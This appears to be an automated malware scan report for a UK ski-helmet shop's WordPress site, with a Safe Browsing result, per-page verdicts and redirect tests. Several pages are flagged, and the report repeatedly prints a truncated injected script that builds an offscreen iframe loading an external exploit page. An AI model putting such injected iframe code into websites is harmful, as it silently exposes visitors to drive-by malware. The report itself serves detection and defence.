Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=skihelmetsshop.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://skihelmetsshop.co.uk/ | 200 OK Content-Length: 25155 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function jquqj09() { var static='ajax'; var controller='index.php'; var jquqj = document.createElement('iframe'); jquqj.src = 'http://mediabruno.it/expsrv.php'; jquqj.style.position = 'absolute'; jquqj.style.color = '31446'; jquqj.style.height = '31446px'; jquqj.style.width = '31446px'; jquqj.style.left = '100031446'; jquqj.style.top = '100031446'; if (!document.getElementById('jquqj')) { document.write('<p id=\'jquqj\' class=\'jquqj09\' ></p>'); document.getElementById('jquqj').appe Antivirus reports:
| ||
http://skihelmetsshop.co.uk/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/javascript | clean |
http://skihelmetsshop.co.uk/wp-content/plugins/dynamic-content-gallery-plugin/js-mootools/scripts/mootools-1.2.4-core-jm.js | 200 OK Content-Length: 79833 Content-Type: application/javascript | clean |
http://skihelmetsshop.co.uk/wp-content/plugins/dynamic-content-gallery-plugin/js-mootools/scripts/mootools-1.2.4.4-more.js | 200 OK Content-Length: 6901 Content-Type: application/javascript | clean |
http://skihelmetsshop.co.uk/wp-content/plugins/dynamic-content-gallery-plugin/js-mootools/scripts/jd.gallery_1_2_4_4.js | 200 OK Content-Length: 28094 Content-Type: application/javascript | clean |
http://skihelmetsshop.co.uk/wp-content/plugins/dynamic-content-gallery-plugin/js-mootools/scripts/jd.gallery.transitions_1_2_4_4.js | 200 OK Content-Length: 3232 Content-Type: application/javascript | clean |
http://skihelmetsshop.co.uk/wp-content/themes/genesis/lib/js/menu/superfish.js?ver=1.4.8 | 200 OK Content-Length: 3083 Content-Type: application/javascript | clean |
http://skihelmetsshop.co.uk/wp-content/themes/genesis/lib/js/menu/superfish.args.js?ver=1.4 | 200 OK Content-Length: 339 Content-Type: application/javascript | clean |
http://skihelmetsshop.co.uk/category/childrens-ski-helmets/ | 200 OK Content-Length: 14778 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function jquqj09() { var static='ajax'; var controller='index.php'; var jquqj = document.createElement('iframe'); jquqj.src = 'http://mediabruno.it/expsrv.php'; jquqj.style.position = 'absolute'; jquqj.style.color = '31446'; jquqj.style.height = '31446px'; jquqj.style.width = '31446px'; jquqj.style.left = '100031446'; jquqj.style.top = '100031446'; if (!document.getElementById('jquqj')) { document.write('<p id=\'jquqj\' class=\'jquqj09\' ></p>'); document.getElementById('jquqj').appe Antivirus reports:
| ||
http://skihelmetsshop.co.uk/category/childrens-snowboard-helmets/ | 200 OK Content-Length: 14780 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function jquqj09() { var static='ajax'; var controller='index.php'; var jquqj = document.createElement('iframe'); jquqj.src = 'http://mediabruno.it/expsrv.php'; jquqj.style.position = 'absolute'; jquqj.style.color = '31446'; jquqj.style.height = '31446px'; jquqj.style.width = '31446px'; jquqj.style.left = '100031446'; jquqj.style.top = '100031446'; if (!document.getElementById('jquqj')) { document.write('<p id=\'jquqj\' class=\'jquqj09\' ></p>'); document.getElementById('jquqj').appe Antivirus reports:
| ||
http://skihelmetsshop.co.uk/category/ladies-ski-helmets/ | 200 OK Content-Length: 14837 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function jquqj09() { var static='ajax'; var controller='index.php'; var jquqj = document.createElement('iframe'); jquqj.src = 'http://mediabruno.it/expsrv.php'; jquqj.style.position = 'absolute'; jquqj.style.color = '31446'; jquqj.style.height = '31446px'; jquqj.style.width = '31446px'; jquqj.style.left = '100031446'; jquqj.style.top = '100031446'; if (!document.getElementById('jquqj')) { document.write('<p id=\'jquqj\' class=\'jquqj09\' ></p>'); document.getElementById('jquqj').appe Antivirus reports:
| ||
http://skihelmetsshop.co.uk/category/ladies-snowboard-helmets/ | 200 OK Content-Length: 14671 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function jquqj09() { var static='ajax'; var controller='index.php'; var jquqj = document.createElement('iframe'); jquqj.src = 'http://mediabruno.it/expsrv.php'; jquqj.style.position = 'absolute'; jquqj.style.color = '31446'; jquqj.style.height = '31446px'; jquqj.style.width = '31446px'; jquqj.style.left = '100031446'; jquqj.style.top = '100031446'; if (!document.getElementById('jquqj')) { document.write('<p id=\'jquqj\' class=\'jquqj09\' ></p>'); document.getElementById('jquqj').appe Antivirus reports:
| ||
http://skihelmetsshop.co.uk/category/mens-ski-helmets/ | 200 OK Content-Length: 14896 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function jquqj09() { var static='ajax'; var controller='index.php'; var jquqj = document.createElement('iframe'); jquqj.src = 'http://mediabruno.it/expsrv.php'; jquqj.style.position = 'absolute'; jquqj.style.color = '31446'; jquqj.style.height = '31446px'; jquqj.style.width = '31446px'; jquqj.style.left = '100031446'; jquqj.style.top = '100031446'; if (!document.getElementById('jquqj')) { document.write('<p id=\'jquqj\' class=\'jquqj09\' ></p>'); document.getElementById('jquqj').appe Antivirus reports:
| ||
http://skihelmetsshop.co.uk/category/mens-snowboard-helmets/ | 200 OK Content-Length: 14546 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function jquqj09() { var static='ajax'; var controller='index.php'; var jquqj = document.createElement('iframe'); jquqj.src = 'http://mediabruno.it/expsrv.php'; jquqj.style.position = 'absolute'; jquqj.style.color = '31446'; jquqj.style.height = '31446px'; jquqj.style.width = '31446px'; jquqj.style.left = '100031446'; jquqj.style.top = '100031446'; if (!document.getElementById('jquqj')) { document.write('<p id=\'jquqj\' class=\'jquqj09\' ></p>'); document.getElementById('jquqj').appe Antivirus reports:
| ||
http://skihelmetsshop.co.uk/mens-snowboard-helmets/ | 200 OK Content-Length: 15465 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function jquqj09() { var static='ajax'; var controller='index.php'; var jquqj = document.createElement('iframe'); jquqj.src = 'http://mediabruno.it/expsrv.php'; jquqj.style.position = 'absolute'; jquqj.style.color = '31446'; jquqj.style.height = '31446px'; jquqj.style.width = '31446px'; jquqj.style.left = '100031446'; jquqj.style.top = '100031446'; if (!document.getElementById('jquqj')) { document.write('<p id=\'jquqj\' class=\'jquqj09\' ></p>'); document.getElementById('jquqj').appe Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: skihelmetsshop.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Jul 2014 18:18:11 GMT
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
X-Pingback: http://skihelmetsshop.co.uk/xmlrpc.php
X-Powered-By: PHP/5.4.23
GET / HTTP/1.1
Host: skihelmetsshop.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Jul 2014 18:18:11 GMT
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
X-Pingback: http://skihelmetsshop.co.uk/xmlrpc.php
X-Powered-By: PHP/5.4.23
Second query (visit from search engine):
GET / HTTP/1.1
Host: skihelmetsshop.co.uk
Referer: http://www.google.com/search?q=skihelmetsshop.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: skihelmetsshop.co.uk
Referer: http://www.google.com/search?q=skihelmetsshop.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.